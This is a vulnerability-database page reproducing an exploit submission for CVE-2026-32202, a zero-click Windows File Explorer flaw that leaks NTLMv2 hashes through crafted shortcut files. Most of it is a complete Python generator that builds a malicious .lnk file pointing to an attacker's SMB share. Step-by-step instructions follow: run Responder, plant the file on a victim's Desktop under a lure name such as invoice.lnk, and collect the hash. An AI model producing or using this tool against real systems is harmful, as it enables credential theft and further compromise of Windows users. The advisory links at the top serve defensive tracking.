Vulners
Lucene search
Microsoft - NTLMv2 Hash Capture
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
 | A Shortcut to Coercion: Incomplete Patch of APT28's Zero-Day Leads to CVE-2026-32202 | 23 Apr 202606:00 | – | akamaiblog |
 | CVE-2026-32202 | 14 Apr 202616:57 | – | attackerkb |
 | CVE-2026-32202 | 14 Apr 202616:57 | – | alpinelinux |
 | Exploit for Protection Mechanism Failure in Microsoft | 30 Apr 202617:34 | – | githubexploit |
 | CVE-2026-32202 | 14 Apr 202615:49 | – | circl |
 | Microsoft Windows Protection Mechanism Failure Vulnerability | 28 Apr 202600:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 28 Apr 202612:00 | – | cisa |
 | Microsoft Windows Shell 安全漏洞 | 14 Apr 202600:00 | – | cnnvd |
 | Microsoft Windows Shell Spoofing Vulnerability | 21 Apr 202600:00 | – | cnvd |
 | CVE-2026-32202 | 14 Apr 202616:57 | – | cve |
10
# Titles: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.
**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)
**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025
**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
```POST
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:
```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""
import struct
import sys
import os
def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
share_name="share"):
"""
Creates LNK file with UNC path to attacker machine
"""
unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'
# LNK structure (standard + vulnerable component)
lnk = bytearray()
# ===== HEADER (76 bytes) =====
lnk.extend(struct.pack('<I', 0x0000004C)) # HeaderSize
# LinkCLSID: {00021401-0000-0000-C000-000000000046}
lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
lnk.extend(struct.pack('<I', 0x000002A3)) # LinkFlags
(HasName|HasWorkingDir|HasArguments|IsUnicode)
lnk.extend(struct.pack('<I', 0x00000080)) # FileAttributes (NORMAL)
lnk.extend(struct.pack('<Q', 0)) # CreationTime
lnk.extend(struct.pack('<Q', 0)) # AccessTime
lnk.extend(struct.pack('<Q', 0)) # WriteTime
lnk.extend(struct.pack('<I', 0x00001000)) # FileSize
lnk.extend(struct.pack('<I', 0x00000000)) # IconIndex
lnk.extend(struct.pack('<I', 0x00000001)) # ShowCommand (SW_NORMAL)
lnk.extend(struct.pack('<H', 0x0000)) # Hotkey
lnk.extend(b'\x00\x00') # Reserved
lnk.extend(b'\x00\x00\x00\x00') # Reserved2
lnk.extend(b'\x00\x00\x00\x00') # Reserved3
# ===== IDLIST (activates when folder is opened) =====
# Shell Folder IDITEM
lnk.extend(b'\x14\x00') # ItemID size (20 bytes)
lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
lnk.extend(b'\x00\x00') # Terminating ID
# ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
# NameString (UNC path - triggers NTLM hash leak)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ArgumentsString (empty)
lnk.extend(b'\x00\x00')
# WorkingDir (UNC path again)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ===== Console Properties (required for some Windows versions) =====
lnk.extend(b'\x50\x00\x14\x00') # dwWindowSize (80x20)
lnk.extend(b'\x50\x00\xfa\x00') # dwBufferSize (80x250)
lnk.extend(b'\x00\x00\x00\x00') # dwFontSize
lnk.extend(b'\x00\x00\x00\x00') # dwFontFamily
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameLen
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameOffset
lnk.extend(b'\x00\x00\x00\x00') # dwStyle
# 64 bytes padding
lnk.extend(b'\x00' * 64)
# Save the file
with open(output_file, 'wb') as f:
f.write(lnk)
return output_file, unc_path
def main():
print(r"""
╔═══════════════════════════════════════════╗
║ CVE-2026-32202 - LNK Generator ║
║ Author: nu11secur1ty ║
╚═══════════════════════════════════════════╝
""")
if len(sys.argv) < 2:
print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP>
[output_file]")
print("Example: python3 cve_2026_32202_gen.py 192.168.1.100
invoice.lnk")
sys.exit(1)
attacker_ip = sys.argv[1]
output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"
lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)
print(f"[+] Exploit ready!")
print(f"[+] File: {lnk_file}")
print(f"[+] UNC path: {unc_path}")
print()
print("[*] Next steps:")
print(f" 1. Start Responder: sudo responder -I eth0 -v")
print(f" 2. Transfer {lnk_file} to Windows 11 Desktop")
print(f" 3. Open Desktop in File Explorer (no click required)")
print(f" 4. Watch Responder - NTLM hash will appear")
print()
with open("start_responder.sh", "w") as f:
f.write("#!/bin/bash\n")
f.write("echo \"[+] Starting Responder...\"\n")
f.write("sudo responder -I eth0 -v\n")
os.chmod("start_responder.sh", 0o755)
print("[+] Helper script created: start_responder.sh")
if __name__ == "__main__":
main()
```
Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)
Code:
[code](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)
Time spent:
02:30:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/
On Wed, May 27, 2026 at 2:06 PM Offsec Exploits <
[email protected]> wrote:
> Hello,
>
> Thank you for your submission.
> We will be checking it shortly.
>
> Regards
> - Exploit-DB Team
>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.14.3
EPSS0.56822
SSVC